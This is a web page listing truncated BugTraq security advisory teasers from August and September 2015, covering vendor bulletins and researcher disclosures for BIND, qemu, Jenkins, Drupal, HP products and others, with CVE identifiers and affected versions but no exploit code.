BugTraq Latest Security Advisories

Syndicate content
The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!
Updated: 1 day 19 hours ago

FreeBSD Security Advisory FreeBSD-SA-15:23.bind

September 3, 2015 - 3:25am

Posted by FreeBSD Security Advisories on Sep 03

=============================================================================
FreeBSD-SA-15:23.bind Security Advisory
The FreeBSD Project

Topic: BIND remote denial of service vulnerability

Category: contrib
Module: bind
Announced: 2015-09-02
Credits: ISC
Affects: FreeBSD 9.x
Corrected: 2015-09-02...
Categories:

[SECURITY] [DSA 3348-1] qemu security update

September 2, 2015 - 12:47pm

Posted by Salvatore Bonaccorso on Sep 02

-------------------------------------------------------------------------
Debian Security Advisory DSA-3348-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 02, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : qemu
CVE ID : CVE-2015-3214 CVE-2015-5154...
Categories:

[SECURITY] [DSA 3349-1] qemu-kvm security update

September 2, 2015 - 12:40pm

Posted by Salvatore Bonaccorso on Sep 02

-------------------------------------------------------------------------
Debian Security Advisory DSA-3349-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 02, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : qemu-kvm
CVE ID : CVE-2015-5165 CVE-2015-5745...
Categories:

Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite Vulnerability

September 2, 2015 - 12:32pm

Posted by Cisco Systems Product Security Incident Response Team on Sep 02

Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite
Vulnerability

Advisory ID: cisco-sa-20150902-cimcs

Revision 1.0

For Public Release 2015 September 2 16:00 UTC (GMT)

+-----------------------------------------------------------------------

Summary
=======
Cisco Integrated Management Controller (IMC) Supervisor and Cisco UCS Director contain a remote file overwrite...
Categories:

[SECURITY] [DSA 3347-1] pdns security update

September 2, 2015 - 10:51am

Posted by Sébastien Delafond on Sep 02

-------------------------------------------------------------------------
Debian Security Advisory DSA-3347-1 security () debian org
https://www.debian.org/security/ Sebastien Delafond
September 02, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : pdns
CVE ID : CVE-2015-5230

Pyry Hakulinen and...
Categories:

ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability

September 2, 2015 - 9:07am

Posted by Security Alert on Sep 02

ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability

EMC Identifier: ESA-2015-137

CVE Identifier: CVE-2015-4538

Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:S/C:C/I:N/A:P)

Affected products:
EMC Atmos 2.3.0 and earlier

Summary:
EMC Atmos includes a XML External Entity Injection vulnerability.

Details:

EMC Atmos is affected by a XML External Entity (XXE) Injection vulnerability due to the configuration of...
Categories:

Cross-Site Request Forgery in Cerb

September 2, 2015 - 6:20am

Posted by High-Tech Bridge Security Research on Sep 02

Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium
CVSSv2 Base Score: 5.1...
Categories:

[slackware-security] gdk-pixbuf2 (SSA:2015-244-01)

September 2, 2015 - 6:12am

Posted by Slackware Security Team on Sep 02

[slackware-security] gdk-pixbuf2 (SSA:2015-244-01)

New gdk-pixbuf2 packages are available for Slackware 13.37, 14.0, 14.1,
and -current to fix a security issue.

Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz: Rebuilt.
Gustavo Grieco discovered a heap overflow in the processing of BMP images
which may result in the execution of arbitrary code if...
Categories:

CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

September 2, 2015 - 6:05am

Posted by David Black on Sep 02

Note: the current version of this advisory can be found at
https://confluence.atlassian.com/x/IcBKLg .

CVE ID: CVE-2015-5603
Product: JIRA and the HipChat for JIRA plugin.
Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
Affected JIRA product versions: 6.3.5 <= version < 6.4.11

Summary:
This advisory discloses a critical severity security vulnerability
that was introduced in version 1.3.2 of the HipChat for JIRA...
Categories:

KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation

September 2, 2015 - 5:56am

Posted by KoreLogic Disclosures on Sep 02

KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write
Privilege Escalation

Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-004
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt

1. Vulnerability Details

Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: XGI VGA Display Manager...
Categories:

KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation

September 1, 2015 - 2:46pm

Posted by KoreLogic Disclosures on Sep 01

KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege
Escalation

Title: SiS Windows VGA Display Manager Multiple Privilege Escalation
Advisory ID: KL-001-2015-003
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-003.txt

1. Vulnerability Details

Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: Windows VGA Display Manager
Affected...
Categories:

[CORE-2015-0013] - FortiClient Antivirus Multiple Vulnerabilities

September 1, 2015 - 12:31pm

Posted by CORE Advisories Team on Sep 01

1. Advisory Information

Title: FortiClient Antivirus Multiple Vulnerabilities
Advisory ID: CORE-2015-0013
Advisory URL: http://www.coresecurity.com/advisories/forticlient-antivirus-multiple-vulnerabilities
Date published: 2015-09-01
Date of last update: 2015-09-01
Vendors contacted: Fortinet
Release mode: Coordinated release

2. Vulnerability Information

Class: Information Exposure [CWE-200], Write-what-where Condition [CWE-123], Exposed...
Categories:

[security bulletin] HPSBMU03339 rev.1 - HP LoadRunner Controller, Local Execution of Arbitrary Code

September 1, 2015 - 12:22pm

Posted by security-alert on Sep 01

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04692147

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04692147
Version: 1

HPSBMU03339 rev.1 - HP LoadRunner Controller, Local Execution of Arbitrary
Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-09-01
Last...
Categories:

[security bulletin] HPSBGN03403 rev.1 - HP Virtualization Performance Viewer, Remote Unauthorized Disclosure of Information

August 31, 2015 - 1:30pm

Posted by security-alert on Aug 31

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04773256

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04773256
Version: 1

HPSBGN03403 rev.1 - HP Virtualization Performance Viewer, Remote Unauthorized
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release...
Categories:

[security bulletin] HPSBMU03401 rev.1 - HP Operations Manager for UNIX and Linux, Remote Unauthorized Modification, Disclosure of Information

August 31, 2015 - 1:22pm

Posted by security-alert on Aug 31

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04770140

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04770140
Version: 1

HPSBMU03401 rev.1 - HP Operations Manager for UNIX and Linux, Remote
Unauthorized Modification, Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as...
Categories:

Dogma India dogmaindia CMS - Auth Bypass Vulnerability

August 31, 2015 - 7:06am

Posted by Vulnerability Lab on Aug 31

Document Title:
===============
Dogma India dogmaindia CMS - Auth Bypass Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1583

Release Date:
=============
2015-08-25

Vulnerability Laboratory ID (VL-ID):
====================================
1583

Common Vulnerability Scoring System:
====================================
8.1

Product & Service Introduction:...
Categories:

[SECURITY] [DSA 3346-1] drupal7 security update

August 31, 2015 - 6:57am

Posted by Alessandro Ghedini on Aug 31

-------------------------------------------------------------------------
Debian Security Advisory DSA-3346-1 security () debian org
https://www.debian.org/security/ Alessandro Ghedini
August 31, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : drupal7
CVE ID : CVE-2015-6658 CVE-2015-6659...
Categories:

Jenkins 1.626 - Cross Site Request Forgery / Code Execution

August 31, 2015 - 6:49am

Posted by smash on Aug 31

#Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution
#Date: 27.08.15
#Affected versions: => 1.626 (current)
#Vendor: jenkins-ci.org
#Contact: smash [at] devilteam.pl

Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to hjiack the authentication of users
for most request. Using CSRF it is able to change specific settings or even execute code on os as shown below.

Examples:

<html>...
Categories:

LinuxOptic CMS 2009 - Auth Bypass Session Vulnerability

August 31, 2015 - 6:41am

Posted by Vulnerability Lab on Aug 31

Document Title:
===============
LinuxOptic CMS 2009 - Auth Bypass Session Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1585

Release Date:
=============
2015-08-26

Vulnerability Laboratory ID (VL-ID):
====================================
1585

Common Vulnerability Scoring System:
====================================
8.1

Product & Service Introduction:...
Categories:

PayPal Bug Bounty #119 - Stored Cross Site Scripting Vulnerability

August 31, 2015 - 6:33am

Posted by Vulnerability Lab on Aug 31

Document Title:
===============
PayPal Bug Bounty #119 - Stored Cross Site Scripting Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1588

Video: http://www.vulnerability-lab.com/get_content.php?id=1587

Vulnerability Magazine:
http://magazine.vulnerability-db.com/?q=articles/2015/08/28/paypal-inc-bug-bounty-2015-stored-cross-site-vulnerability-disclosed-researcher

Release Date:...
Categories: